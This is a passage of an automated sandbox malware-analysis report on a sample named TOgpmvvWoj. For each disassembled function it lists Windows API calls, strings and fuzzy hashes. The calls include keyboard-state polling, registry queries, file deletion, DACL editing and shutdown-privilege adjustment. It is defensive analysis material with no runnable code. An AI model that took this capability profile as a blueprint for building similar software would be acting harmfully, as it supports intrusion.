                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Close$ConnectCreateRegistryValue
                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                            • API String ID: 536824911-966354055
                                            • Opcode ID: 8a6d113cc9706e67caf63826dc8974dfebc5c9962037f5581f34b349ef175936
                                            • Instruction ID: 699ac0ba061870d9e6aae687d3d0611d157490ee76a70d9df4def6a5993bc51c
                                            • Opcode Fuzzy Hash: 8a6d113cc9706e67caf63826dc8974dfebc5c9962037f5581f34b349ef175936
                                            • Instruction Fuzzy Hash: E3027E752006119FCB14EF24C895E6AB7E5FF88714F04985DF89AAB3A2CB31ED45CB81
                                            Function 00E7F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00E7F37E
                                            • _wcscmp.LIBCMT ref: 00E7F393
                                            • _wcscmp.LIBCMT ref: 00E7F3AA
                                              • Part of subcall function 00E745C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E745DC
                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00E7F3D9
                                            • FindClose.KERNEL32(00000000), ref: 00E7F3E4
                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00E7F400
                                            • _wcscmp.LIBCMT ref: 00E7F427
                                            • _wcscmp.LIBCMT ref: 00E7F43E
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00E7F450
                                            • SetCurrentDirectoryW.KERNEL32(00ECA5A0), ref: 00E7F46E
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E7F478
                                            • FindClose.KERNEL32(00000000), ref: 00E7F485
                                            • FindClose.KERNEL32(00000000), ref: 00E7F497
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                            • String ID: *.*
                                            • API String ID: 1824444939-438819550
                                            • Opcode ID: 906dcc78c332487fc5ae59e80a045793336b12eace8df58a1c0b982ae9a93874
                                            • Instruction ID: a4f0698ca9bd197c3ad96556d2722ddebe1840d4b1585ba8f00c779e214d515f
                                            • Opcode Fuzzy Hash: 906dcc78c332487fc5ae59e80a045793336b12eace8df58a1c0b982ae9a93874
                                            • Instruction Fuzzy Hash: 6431B1715012196FCB109F74EC89EEE77AC9F09328F149276E818F20A0EB34DA45CA60
                                            Function 00E681F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E6874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E68766
                                              • Part of subcall function 00E6874A: GetLastError.KERNEL32(?,00E6822A,?,?,?), ref: 00E68770
                                              • Part of subcall function 00E6874A: GetProcessHeap.KERNEL32(00000008,?,?,00E6822A,?,?,?), ref: 00E6877F
                                              • Part of subcall function 00E6874A: HeapAlloc.KERNEL32(00000000,?,00E6822A,?,?,?), ref: 00E68786
                                              • Part of subcall function 00E6874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E6879D
                                              • Part of subcall function 00E687E7: GetProcessHeap.KERNEL32(00000008,00E68240,00000000,00000000,?,00E68240,?), ref: 00E687F3
                                              • Part of subcall function 00E687E7: HeapAlloc.KERNEL32(00000000,?,00E68240,?), ref: 00E687FA
                                              • Part of subcall function 00E687E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E68240,?), ref: 00E6880B
                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E6825B
                                            • _memset.LIBCMT ref: 00E68270
                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E6828F
                                            • GetLengthSid.ADVAPI32(?), ref: 00E682A0
                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00E682DD
                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E682F9
                                            • GetLengthSid.ADVAPI32(?), ref: 00E68316
                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E68325
                                            • HeapAlloc.KERNEL32(00000000), ref: 00E6832C
                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E6834D
                                            • CopySid.ADVAPI32(00000000), ref: 00E68354
                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E68385
                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E683AB
                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E683BF
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                            • String ID:
                                            • API String ID: 3996160137-0
                                            • Opcode ID: 448b0398f750897a4ebd41720554c41166313a52bac67e7867ffdef5fa25c931
                                            • Instruction ID: 15ad62de24937553412028a1f823254a260c642f903362ea8639e1bbb4410610
                                            • Opcode Fuzzy Hash: 448b0398f750897a4ebd41720554c41166313a52bac67e7867ffdef5fa25c931
                                            • Instruction Fuzzy Hash: D6615B71940209EFDF009FA5ED44AAEBBB9FF04744F14922AE815FA291DB319A15CB60
                                            Function 00E26843 Relevance: 20.9, Strings: 16, Instructions: 883COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$PJ$UCP)$UTF)$UTF16)
                                            • API String ID: 0-1331342731
                                            • Opcode ID: 3e4c3cd2b67cde94df7a9e0ff2a2891e412fb06371628310d0bfc3eb23d6cdcc
                                            • Instruction ID: 705f43efe37212557b80f4dd9c0776234372b716d4ae9b1ca0d6bd7181d1ec1c
                                            • Opcode Fuzzy Hash: 3e4c3cd2b67cde94df7a9e0ff2a2891e412fb06371628310d0bfc3eb23d6cdcc
                                            • Instruction Fuzzy Hash: B4728071E002299BDB15DF58E8817EEB7B5FF88354F1491AAE845FB290DB309D81CB90
                                            Function 00E90665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E90038,?,?), ref: 00E910BC
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E90737
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E907D6
                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E9086E
                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00E90AAD
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E90ABA
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                            • String ID:
                                            • API String ID: 1240663315-0
                                            • Opcode ID: 4072985e19964bc5b1b429fdb8bdb10b0b280f897cef6361a6192f1d616af4da
                                            • Instruction ID: d3f3e3f05994fcf380a36939a60d0d8eae166f9eb89e990b60c5e52519698cd7
                                            • Opcode Fuzzy Hash: 4072985e19964bc5b1b429fdb8bdb10b0b280f897cef6361a6192f1d616af4da
                                            • Instruction Fuzzy Hash: 3BE16D31204310AFCB14DF29C891E6ABBF9EF89714F04946DF45AEB2A2DA30ED45CB51
                                            Function 00E70219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetKeyboardState.USER32(?), ref: 00E70241
                                            • GetAsyncKeyState.USER32(000000A0), ref: 00E702C2
                                            • GetKeyState.USER32(000000A0), ref: 00E702DD
                                            • GetAsyncKeyState.USER32(000000A1), ref: 00E702F7
                                            • GetKeyState.USER32(000000A1), ref: 00E7030C
                                            • GetAsyncKeyState.USER32(00000011), ref: 00E70324
                                            • GetKeyState.USER32(00000011), ref: 00E70336
                                            • GetAsyncKeyState.USER32(00000012), ref: 00E7034E
                                            • GetKeyState.USER32(00000012), ref: 00E70360
                                            • GetAsyncKeyState.USER32(0000005B), ref: 00E70378
                                            • GetKeyState.USER32(0000005B), ref: 00E7038A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: State$Async$Keyboard
                                            • String ID:
                                            • API String ID: 541375521-0
                                            • Opcode ID: ded4dc9119db312672fbe559b20eec03ee642987c25488acc78ef2e071ee0452
                                            • Instruction ID: d829216ddb4961c1265286ab0a2b2a67129f54125c04f2e2c0dd86b4b08e120f
                                            • Opcode Fuzzy Hash: ded4dc9119db312672fbe559b20eec03ee642987c25488acc78ef2e071ee0452
                                            • Instruction Fuzzy Hash: DA4179645047C9FFFF319A6484087B5BFA06B12348F08D05ED5CD665D3E7945DC88792
                                            Function 00E886D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            • CoInitialize.OLE32 ref: 00E88718
                                            • CoUninitialize.OLE32 ref: 00E88723
                                            • CoCreateInstance.OLE32(?,00000000,00000017,00EA2BEC,?), ref: 00E88783
                                            • IIDFromString.OLE32(?,?), ref: 00E887F6
                                            • VariantInit.OLEAUT32(?), ref: 00E88890
                                            • VariantClear.OLEAUT32(?), ref: 00E888F1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                            • API String ID: 834269672-1287834457
                                            • Opcode ID: 79064ca888bdf774a4cde6c6bddc1f97e1dcf87f29f1c4c763440b6da6c82c84
                                            • Instruction ID: de3a3b2e971e27beb2f799f447c7240280db612c8c55a63c3c57b7c00169b33d
                                            • Opcode Fuzzy Hash: 79064ca888bdf774a4cde6c6bddc1f97e1dcf87f29f1c4c763440b6da6c82c84
                                            • Instruction Fuzzy Hash: 3C6190706083019FD714EF64CA48B5ABBE4AF48714F94581EF989BB291CB70ED48CB92
                                            Function 00E84458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                            • String ID:
                                            • API String ID: 1737998785-0
                                            • Opcode ID: 1515cf53f5cb35f413f7b49f8d1edff00ade4f16efbd4b0f2ebe6b45ef891316
                                            • Instruction ID: cad758c8fb89ff93abe034ef025ac0b575e7d44574c315c4362ceb008a5d7879
                                            • Opcode Fuzzy Hash: 1515cf53f5cb35f413f7b49f8d1edff00ade4f16efbd4b0f2ebe6b45ef891316
                                            • Instruction Fuzzy Hash: 012181752012119FDB10AF65EC19B6D7BA8EF44715F10802BF94AFB2B2DB74AD04CB94
                                            Function 00E73A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E148A1,?,?,00E137C0,?), ref: 00E148CE
                                              • Part of subcall function 00E74CD3: GetFileAttributesW.KERNEL32(?,00E73947), ref: 00E74CD4
                                            • FindFirstFileW.KERNEL32(?,?), ref: 00E73ADF
                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E73B87
                                            • MoveFileW.KERNEL32(?,?), ref: 00E73B9A
                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00E73BB7
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E73BD9
                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E73BF5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                            • String ID: \*.*
                                            • API String ID: 4002782344-1173974218
                                            • Opcode ID: 33fcf8ccaed72e389740de3c2ad522d90d143d32a76b63311d40c899b2fde21b
                                            • Instruction ID: 9c1a4499f28f8215fd73c42c560e11aa3d91ab9e2109922ed147824b21bced0c
                                            • Opcode Fuzzy Hash: 33fcf8ccaed72e389740de3c2ad522d90d143d32a76b63311d40c899b2fde21b
                                            • Instruction Fuzzy Hash: 3E51803180114D9ACF15EBB0CD929EDB7B9AF14304F64A1AAE44A77091EF306F4DDBA0
                                            Function 00E24140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ERCP$Oa$VUUU$VUUU$VUUU$VUUU
                                            • API String ID: 0-3486589167
                                            • Opcode ID: a4ec3a7106d66fa66a80b1bed3fcd277913a005b66b0f31097a4c2ebb9b7a110
                                            • Instruction ID: 395d52a3d5e1b5638cc7e60ab0e62c40bf53a3442882a229ab91f3f9b0f8088f
                                            • Opcode Fuzzy Hash: a4ec3a7106d66fa66a80b1bed3fcd277913a005b66b0f31097a4c2ebb9b7a110
                                            • Instruction Fuzzy Hash: DFA29EB0E0422ACBDF28CF58E9407EDB7B1BB54319F14A5AAD856B7280D7709E85CF50
                                            Function 00E7F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00E7F6AB
                                            • Sleep.KERNEL32(0000000A), ref: 00E7F6DB
                                            • _wcscmp.LIBCMT ref: 00E7F6EF
                                            • _wcscmp.LIBCMT ref: 00E7F70A
                                            • FindNextFileW.KERNEL32(?,?), ref: 00E7F7A8
                                            • FindClose.KERNEL32(00000000), ref: 00E7F7BE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                            • String ID: *.*
                                            • API String ID: 713712311-438819550
                                            • Opcode ID: 78fc8fc5ebdf0c8f10b837f8e056a6f0392a727e31a673a130d59061c703fd5e
                                            • Instruction ID: 5c72bae378ddc95d1131c833805ea21912acf12c1f7199160c139fb72bf078df
                                            • Opcode Fuzzy Hash: 78fc8fc5ebdf0c8f10b837f8e056a6f0392a727e31a673a130d59061c703fd5e
                                            • Instruction Fuzzy Hash: FA415E7191420A9FCF15DF64CC89AEEBBB4FF05314F14956AE819B61A1EB309E84CB90
                                            Function 00E258C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: 00ee8a7557a5f4351bf2ceccaf083b1703082baa2eb763f71c4dd425b46c0457
                                            • Instruction ID: 39a0a5a6b60228b233c8831a1ce796b7033cffbfd6f7e6b76acc334606459120
                                            • Opcode Fuzzy Hash: 00ee8a7557a5f4351bf2ceccaf083b1703082baa2eb763f71c4dd425b46c0457
                                            • Instruction Fuzzy Hash: 10128871A00619EBDF04CFA4EA85AEEB7F5FF48300F105569E446B7290EB36AD51CB50
                                            Function 00E25680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E30FF6: std::exception::exception.LIBCMT ref: 00E3102C
                                              • Part of subcall function 00E30FF6: __CxxThrowException@8.LIBCMT ref: 00E31041
                                            • _memmove.LIBCMT ref: 00E6062F
                                            • _memmove.LIBCMT ref: 00E60744
                                            • _memmove.LIBCMT ref: 00E607EB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                            • String ID: yZ
                                            • API String ID: 1300846289-3798167742
                                            • Opcode ID: de6a26d1867f25d2c3e8f5e056e159eea369bf32fab8826f60b9c6180f447bea
                                            • Instruction ID: 75eb4d9142bfbe0908b80bb5dc6a701d3dd6b9138680417ae89e04b634cbe819
                                            • Opcode Fuzzy Hash: de6a26d1867f25d2c3e8f5e056e159eea369bf32fab8826f60b9c6180f447bea
                                            • Instruction Fuzzy Hash: F4029F71A00219DFCF08DF64E981AAEBBF5FF44340F1490A9E806EB255EB31DA55CB91
                                            Function 00E7545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E68CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E68D0D
                                              • Part of subcall function 00E68CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E68D3A
                                              • Part of subcall function 00E68CC3: GetLastError.KERNEL32 ref: 00E68D47
                                            • ExitWindowsEx.USER32(?,00000000), ref: 00E7549B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                            • String ID: $@$SeShutdownPrivilege
                                            • API String ID: 2234035333-194228
                                            • Opcode ID: 107ee8210928fa312560f9c19cbf24b593862e9c21f3786e8ae7fef8e1e9a29d
                                            • Instruction ID: 3bc1098a1dd2052b4c2b09f5d26d6aa5827d75352bb063654825355c8a5ac079
                                            • Opcode Fuzzy Hash: 107ee8210928fa312560f9c19cbf24b593862e9c21f3786e8ae7fef8e1e9a29d
                                            • Instruction Fuzzy Hash: 97014C33694B152EE7285374EC4ABFA7258EB01342F24A132FD2FF20D2F9D01C804290
                                            Function 00E23190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
